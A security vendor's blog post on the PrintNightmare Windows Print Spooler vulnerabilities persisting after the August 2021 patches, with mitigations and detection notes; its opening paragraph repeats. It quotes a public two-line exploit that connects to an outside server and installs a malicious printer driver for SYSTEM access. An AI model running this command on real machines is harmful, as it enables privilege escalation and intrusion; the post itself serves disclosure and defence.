PrintNightmare is a set of software vulnerabilities around Windows’ Print Spooler service. It was originally disclosed in July as CVE-2021-34527 – a print spooler remote code execution – and CVE-2021-1675 – a print spooler privilege escalation. They allow an attacker to elevate privileges from a regular user to system privileges remotely over the network (as you can see here). Several patches were made available in July and subsequently bypassed. System owners everywhere scrambled to put mitigations in place. Our products have detection. On Tuesday there was one last round of updates, and all is good. So we thought.

PrintNightmare-image-feature
PrintNightmare-image-feature

PrintNightmare is a set of software vulnerabilities around Windows’ Print Spooler service. It was originally disclosed in July as CVE-2021-34527 – a print spooler remote code execution – and CVE-2021-1675 – a print spooler privilege escalation. They allow an attacker to elevate privileges from a regular user to system privileges remotely over the network (as you can see here). Several patches were made available in July and subsequently bypassed. System owners everywhere scrambled to put mitigations in place. Our products have detection. On Tuesday there was one last round of updates, and all is good. So we thought.

But What Happened!?

August’s patches are not enough to fix the issues. Microsoft released another security advisory for which there is no patch. What is even more confusing is that the advisories given by the US’ CERT-CC and the Canadian Center for Cyber Security (CCCS) talk about the August 10th patches and imply that this is fixed.

PrintNightmare-image-1
Figure 1 – Freshly reproduced vulnerability (post August updates)

Handed on a Silver Platter

Last month there was already a reliable public proof of concept (PoC) exploit circulating, integrated in the reputable mimikatz package. However, to spice things up, Kevin Beaumont released a two liner batch file that exploits the vulnerability by leveraging the existing gentilkiwi’s server already exposed on the Internet. He dubbed it “SystemNightmare”.

PrintNightmare-image-2
Figure 2 – The Silver Platter

Here’s the code:
net use \\printnightmare.gentilkiwi.com\ipc$ /user:gentilguest password rundll32 printui.dll,PrintUIEntry /in /n"\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"

If you tried that PoC in your lab and it didn’t work, remember that many ISPs block outbound TCP 445 which is what the SMB service uses. The above “net use” command will initiate SMB traffic to printnightmare.gentilkiwi.com. However, that is not the case for business-grade Internet connections. Make sure to test the PoC in the adequate environment to determine if you are affected or not by this vulnerability.

We know from experience what happens when a vulnerability gets this easy to exploit: it is quickly leveraged by opportunistic attackers. This is already the case with the Magniber ransomware group using it to attack targets in South Korea.

What Should You Do?

First, make sure you applied July and August monthly updates. Next, make sure you understand properly the risk profile of this vulnerability: the attacker must already have credentials of at least one regular user in the network to perform the local privilege escalation or remote code execution attack successfully.

The first mitigation is to disable the spooler service in Windows, which can be accomplished by executing the following commands in an elevated PowerShell prompt.

Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

The second mitigation is to disable inbound remote printing through Group Policy. You can also configure the settings via Group Policy as follows: Computer Configuration / Administrative Templates / Printers.

The third mitigation is to make sure that in your Group Policy for “Computer Configuration -> Administrative Templates -> Network -> Lanman Workstation -> Enable insecure guest logons” is disabled. This ensures that the server cannot access guest shares. This will NOT protect against the exploit itself. However, it does prevent exploit attempts that setup a guest share to distribute the malicious DLL.

The fourth mitigation is to segment the network in a way, which does not allow regular users to interact with systems that require the print spooler service.

If you have a large network and need to determine which endpoints are vulnerable you can scan entire subnets for the vulnerability using this tool.

Since this story keeps on giving, I would advise you refer to mimispool’s documentation for additional mitigation.

Protecting our Customers

GoSecure Titan Labs has tested the Proof of Concept (PoC) exploits on a new installation of Windows Server 2019 installation and the exploit was successful. GoSecure Titan Labs have created heuristic signatures to identify suspicious printer driver requests within short succession of each other, which provides the key behavioral indicators to identify exploit attempts.
PrintNightmare-image-3
Figure 3 – PrintNightmare registry key changes detected
PrintNightmare-image-4
Figure 4 – PrintNightmare DLL drop detected
Our vulnerability management as a service (VMaaS) group is monitoring this issue closely and pushing patches as they are made available. They also worked with multiple clients to evaluate the risks and deploy the aforementioned mitigations. In many corporate environments, the features abused by the PrintNightmare set of vulnerabilities can be safely disabled on both servers and endpoints.

Not The Last One

Unfortunately, we predict that these confusing partial patch and exploit cycles with Microsoft are far from over. Their products are complex, and Microsoft has been extremely reluctant on changing default behavior even when the default behavior turns into security issues. We personally experienced that when we dealt with them on the Windows Server Update Services (WSUS) vulnerabilities last year (part 1, part 2). Furthermore, members of the community started maintaining lists of unpatched vulnerabilities from Microsoft. This is for one vendor which does provide reliable and automatic updates. Imagine trying to stay up to date when you have exposed VPN, MFA appliances and all sorts of servers…

Thanks to Ryan Ackroyed, Olivier Bilodeau, Lilly Chalupowski, Katie Horne, Sean Mahoney, Julien Pineault and Griffin Whynacht who were instrumental for the detection of PrintNightmare by our products and the writing of this article.

Détection et réponse gérées Titan
Antivirus de nouvelle génération
Détection et réponse sur les terminaux
Détection et réponse sur le réseau
Détection et réponse sur les boîtes de messagerie
Détection et réponse face aux menaces internes
Gestion des pare-feu
Gestion des SIEM
La gestion des vulnérabilités en tant que service
GoSecure Titan
Logiciel Titan
Sécurité de la messagerie
Sécurité Web
Boîte à outils «Responder PRO Forensics»
Services professionnels
Services de détection de brèches
Évaluation de la cybersécurité
Évaluation de la compromission de la sécurité
Piratage éthique
Réponse aux incidents et analyse de type «forensics»
Services de conformité et d’audit
Technologies fournies par des tiers

Pin It on Pinterest

Share This